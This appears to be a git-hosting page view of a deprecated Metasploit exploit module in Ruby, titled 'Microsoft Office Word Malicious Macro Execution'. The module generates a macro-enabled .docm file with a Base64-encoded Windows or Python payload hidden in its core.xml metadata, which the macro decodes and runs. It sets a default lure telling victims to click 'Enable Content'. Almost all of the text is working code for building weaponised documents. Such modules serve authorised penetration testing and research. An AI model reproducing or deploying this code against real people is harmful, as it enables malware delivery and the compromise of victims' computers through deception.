wchen-r7
7503f643cc
Please use exploits/multi/fileformat/office_word_macro instead, because the new one supports OS X.
123 lines
3.2 KiB
Ruby
123 lines
3.2 KiB
Ruby
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
require 'rex/zip'
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::FILEFORMAT
|
|
include Msf::Exploit::EXE
|
|
|
|
def initialize(info={})
|
|
super(update_info(info,
|
|
'Name' => "Microsoft Office Word Malicious Macro Execution",
|
|
'Description' => %q{
|
|
This module generates a macro-enabled Microsoft Office Word document. The comments
|
|
metadata in the data is injected with a Base64 encoded payload, which will be
|
|
decoded by the macro and execute as a Windows executable.
|
|
|
|
For a successful attack, the victim is required to manually enable macro execution.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'sinn3r' # Metasploit
|
|
],
|
|
'References' =>
|
|
[
|
|
['URL', 'https://en.wikipedia.org/wiki/Macro_virus']
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'EXITFUNC' => 'thread',
|
|
'DisablePayloadHandler' => true
|
|
},
|
|
'Targets' =>
|
|
[
|
|
[
|
|
'Microsoft Office Word on Windows',
|
|
{
|
|
'Platform' => 'win',
|
|
}
|
|
],
|
|
[
|
|
'Microsoft Office Word on Mac OS X (Python)',
|
|
{
|
|
'Platform' => 'python',
|
|
'Arch' => ARCH_PYTHON
|
|
}
|
|
]
|
|
],
|
|
'Privileged' => false,
|
|
'DisclosureDate' => "Jan 10 2012"
|
|
))
|
|
|
|
register_options([
|
|
OptString.new("BODY", [false, 'The message for the document body',
|
|
'Contents of this document are protected. Please click Enable Content to continue.'
|
|
]),
|
|
OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
|
|
], self.class)
|
|
end
|
|
|
|
|
|
def on_file_read(short_fname, full_fname)
|
|
buf = File.read(full_fname)
|
|
|
|
case short_fname
|
|
when /document\.xml/
|
|
buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
|
|
when /core\.xml/
|
|
p = target.name =~ /Python/ ? payload.encoded : generate_payload_exe
|
|
b64_payload = ' ' * 55
|
|
b64_payload << Rex::Text.encode_base64(p)
|
|
buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
|
|
end
|
|
|
|
# The original filename of __rels is actually ".rels".
|
|
# But for some reason if that's our original filename, it won't be included
|
|
# in the archive. So this hacks around that.
|
|
case short_fname
|
|
when /__rels/
|
|
short_fname.gsub!(/\_\_rels/, '.rels')
|
|
end
|
|
|
|
yield short_fname, buf
|
|
end
|
|
|
|
|
|
def package_docm(path)
|
|
zip = Rex::Zip::Archive.new
|
|
|
|
Dir["#{path}/**/**"].each do |file|
|
|
p = file.sub(path+'/','')
|
|
|
|
if File.directory?(file)
|
|
print_status("Packaging directory: #{file}")
|
|
zip.add_file(p)
|
|
else
|
|
on_file_read(p, file) do |fname, buf|
|
|
print_status("Packaging file: #{fname}")
|
|
zip.add_file(fname, buf)
|
|
end
|
|
end
|
|
end
|
|
|
|
zip.pack
|
|
end
|
|
|
|
|
|
def exploit
|
|
print_status('Generating our docm file...')
|
|
path = File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro')
|
|
docm = package_docm(path)
|
|
file_create(docm)
|
|
super
|
|
end
|
|
|
|
end
|